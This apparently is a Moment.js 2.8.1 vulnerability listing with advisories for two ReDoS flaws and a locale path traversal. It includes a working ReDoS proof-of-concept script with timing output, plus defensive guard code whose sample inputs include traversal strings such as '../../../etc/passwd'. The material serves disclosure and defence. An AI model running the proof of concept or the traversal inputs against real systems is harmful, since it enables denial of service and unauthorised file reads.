Moment.js version 2.8.1 builds upon the solid foundation of version 2.7.0, offering refinements and additions to this popular JavaScript date manipulation library. Both versions provide developers with powerful tools for parsing, validating, manipulating, and formatting dates, suitable for a wide range of applications, from simple date displays to complex calendar systems. Key functionalities like date arithmetic, timezone handling (with the Moment Timezone add-on), and internationalization are central to both releases.
The shift from 2.7.0 to 2.8.1 introduces a few notable enhancements. Although the core functionality remains consistent, developers might be interested in the updated development dependencies in version 2.8.1, which include packages such as grunt-benchmark, grunt-jscs and karma-chrome-launcher; grunt-benchmark is new in 2.8.1 and shows an effort to improve the quality of the software through benchmarking. While these are primarily for development and testing purposes, they can indirectly reflect improved efficiency and code quality. The release date difference indicates active maintenance and iterative improvement within the Moment.js project. Developers already using Moment.js will find the upgrade straightforward, while new users will benefit from a mature and actively maintained library. Ultimately, both versions empower developers to manage dates effectively within their JavaScript projects.
All vulnerabilities affecting version 2.8.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');

// Build a string of len + 1 copies of chr. Note that i is never declared,
// so this loop and the timing loop below share the same global counter;
// that is why the recorded COUNT values advance by 10001 rather than 10000
// and LENGTH is two more than COUNT.
var genstr = function (len, chr) {
    var result = "";
    for (i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// Feed progressively longer all-digit strings to moment.duration() and time
// each call; the recorded times grow roughly quadratically with the length.
for (i = 20000; i <= 10000000; i = i + 10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1');
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str);
    var end = process.hrtime(start);
    console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
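Both ReDoS advisories above (moment.duration() before 2.11.2 and date-string parsing before 2.19.3) share the same mitigation besides upgrading: never hand an unbounded, untrusted string to a regex-backed parser. The guard below is an added example, not moment.js project code; it caps the length and checks the string against patterns with bounded quantifiers before the caller ever invokes moment. The 64-character cap and the accepted grammars are assumptions made for this example (a deliberately narrow subset of what moment accepts), and moment itself is not loaded so the guard runs stand-alone.

```javascript
// Added example (not moment.js project code): bound and pre-validate untrusted
// strings before passing them to a regex-backed parser such as moment.duration()
// or moment(String). Assumptions: the 64-character cap and the accepted grammars
// below are choices made for this example, not moment's own limits.

const MAX_INPUT_LEN = 64;

// Every quantifier is bounded and adjacent pieces cannot overlap, so matching
// costs time linear in the (already capped) input: there is no ambiguity for
// the engine to backtrack over.
const ISO_DURATION_RE =
  /^[+-]?P(?:\d{1,9}Y)?(?:\d{1,9}M)?(?:\d{1,9}W)?(?:\d{1,9}D)?(?:T(?:\d{1,9}H)?(?:\d{1,9}M)?(?:\d{1,9}(?:\.\d{1,9})?S)?)?$/;
const CLOCK_DURATION_RE = /^[+-]?\d{1,9}(?::\d{1,2}){1,2}(?:\.\d{1,9})?$/;
const INTEGER_RE = /^[+-]?\d{1,15}$/;
// Characters found in the date-string formats a web app typically accepts
// (ISO 8601, RFC 2822 style); anything else is rejected before parsing.
const DATE_CHARS_RE = /^[0-9A-Za-z ,.:\/+-]{1,64}$/;

function reject(reason) {
  return { ok: false, kind: null, reason };
}

// Classify a candidate moment.duration() argument without parsing it.
function guardDurationInput(input) {
  if (typeof input === 'number') {
    // Numbers never reach the string parser, so they need no length cap.
    return Number.isFinite(input) ? { ok: true, kind: 'number', reason: null } : reject('non-finite number');
  }
  if (typeof input !== 'string') return reject('not a string');
  if (input.length > MAX_INPUT_LEN) return reject('too long'); // cheapest check first
  if (INTEGER_RE.test(input)) return { ok: true, kind: 'integer', reason: null };
  if (CLOCK_DURATION_RE.test(input)) return { ok: true, kind: 'clock', reason: null };
  // 'P' or 'PT' with no components, or a trailing 'T', is syntactically empty.
  if (ISO_DURATION_RE.test(input) && /\d/.test(input) && !/T$/.test(input)) {
    return { ok: true, kind: 'iso', reason: null };
  }
  return reject('unrecognised duration syntax');
}

// Same idea for strings destined for moment(String): cap, then allowlist characters.
function guardDateInput(input) {
  if (typeof input !== 'string') return reject('not a string');
  if (input.length > MAX_INPUT_LEN) return reject('too long');
  if (!DATE_CHARS_RE.test(input)) return reject('disallowed characters');
  return { ok: true, kind: 'date-string', reason: null };
}

// How a caller wires the guard in front of a parser; `parser` stands in for
// moment.duration so the example runs without moment installed.
function parseDurationSafely(input, parser) {
  const verdict = guardDurationInput(input);
  if (!verdict.ok) return { error: verdict.reason, value: null };
  return { error: null, value: parser(input) };
}

// Constructed inputs, including the shape of the proof-of-concept string
// above ('-' followed by tens of thousands of digits).
const SAMPLES = [
  'P1DT2H', '-1:30:00', '3600', 'PT', '-' + '1'.repeat(20002), 'dir/../../filename',
];

function demoGuards() {
  return SAMPLES.map((s) => [s.length > 20 ? s.slice(0, 8) + '...' : s, guardDurationInput(s)]);
}

for (const [label, verdict] of demoGuards()) {
  console.log(label, JSON.stringify(verdict));
}
```

The length check runs first because it is the only step whose cost does not depend on the pattern; with the cap in place, even a parser that still has a super-linear regex is bounded to work on at most 64 characters.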
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string (e.g. fr) is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
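One way to do that sanitisation, as an added example rather than moment.js project code: resolve the requested name against an allowlist of the locales the application actually ships, and let nothing else through to moment.locale(). The locale set, the fallback and the name pattern below are assumptions of this example (some of moment's own locale names, such as x-pseudo, fall outside the pattern and would need adding); the point is that a value containing a path separator or `..` is rejected as a whole before any loader can turn it into a file path.

```javascript
// Added example (not moment.js project code): allowlist-based locale
// resolution to put in front of moment.locale().
// Assumptions: SUPPORTED_LOCALES is constructed for this example; a real
// application derives it from the locale files it bundles.

const SUPPORTED_LOCALES = new Set(['en', 'en-gb', 'fr', 'de', 'es', 'zh-cn', 'pt-br']);
const DEFAULT_LOCALE = 'en';

// Locale names are short, lowercase ASCII language tags joined by '-'.
// '/', '\\', '.', whitespace and non-ASCII never match, so a value such as
// 'dir/../../filename' is rejected outright rather than "cleaned up".
const LOCALE_NAME_RE = /^[a-z]{2,3}(?:-[a-z0-9]{2,8}){0,2}$/;

function resolveLocale(requested, supported = SUPPORTED_LOCALES, fallback = DEFAULT_LOCALE) {
  if (typeof requested !== 'string') {
    return { locale: fallback, accepted: false, reason: 'not a string' };
  }
  // Normalise the common client spellings ('FR', 'en_GB') before validating.
  const name = requested.trim().toLowerCase().replace(/_/g, '-');
  if (!LOCALE_NAME_RE.test(name)) {
    return { locale: fallback, accepted: false, reason: 'invalid locale name' };
  }
  if (supported.has(name)) {
    return { locale: name, accepted: true, reason: null };
  }
  // Degrade a regional variant to its base language ('fr-ca' -> 'fr') when
  // only the base is shipped; the result is still an allowlisted value.
  const base = name.split('-')[0];
  if (supported.has(base)) {
    return { locale: base, accepted: true, reason: 'base language only' };
  }
  return { locale: fallback, accepted: false, reason: 'unsupported locale' };
}

// Apply the resolved value. `setLocale` stands in for moment.locale so the
// example runs without moment installed; with moment it would be
// (name) => moment.locale(name).
function applyRequestedLocale(requested, setLocale) {
  const result = resolveLocale(requested);
  setLocale(result.locale);
  return result;
}

// Constructed request values, including the advisory's traversal shape.
const REQUESTS = ['fr', 'FR-CA', 'pt_BR', 'dir/../../filename', '../../../etc/passwd', '', null];

function demoLocales() {
  return REQUESTS.map((r) => ({ requested: r, ...applyRequestedLocale(r, () => {}) }));
}

for (const row of demoLocales()) {
  console.log(JSON.stringify(row));
}
```

Whatever the outcome, the value that reaches moment.locale() is always one taken from the allowlist or the fixed fallback, never the raw request string.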